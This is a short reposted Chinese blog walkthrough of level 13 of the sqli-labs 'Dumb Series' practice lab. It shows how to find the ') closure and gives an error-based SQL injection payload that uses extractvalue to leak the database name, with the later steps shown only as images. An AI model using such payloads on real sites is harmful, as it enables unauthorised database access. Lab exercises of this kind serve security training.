码迷,mamicode.com
首页 > 数据库 > 详细

SQLI DUMB SERIES-13

时间:2019-04-14 15:53:46      阅读:125      评论:0      收藏:0      [点我收藏+]

标签:database   sql   img   png   ase   com   info   highlight   code   

(1)检测闭合方式

技术图片

通过 ‘) 闭合。

(2)尝试输入 admin‘)# 无回显。尝试报错注入,

爆表payload:

admin‘) and extractvalue(1,concat(0x7e,(select database())))  and (‘

技术图片

爆表名

技术图片

爆users表的列

技术图片

其他均与12关相同。

SQLI DUMB SERIES-13

标签:database   sql   img   png   ase   com   info   highlight   code   

原文地址:https://www.cnblogs.com/momoli/p/10705249.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!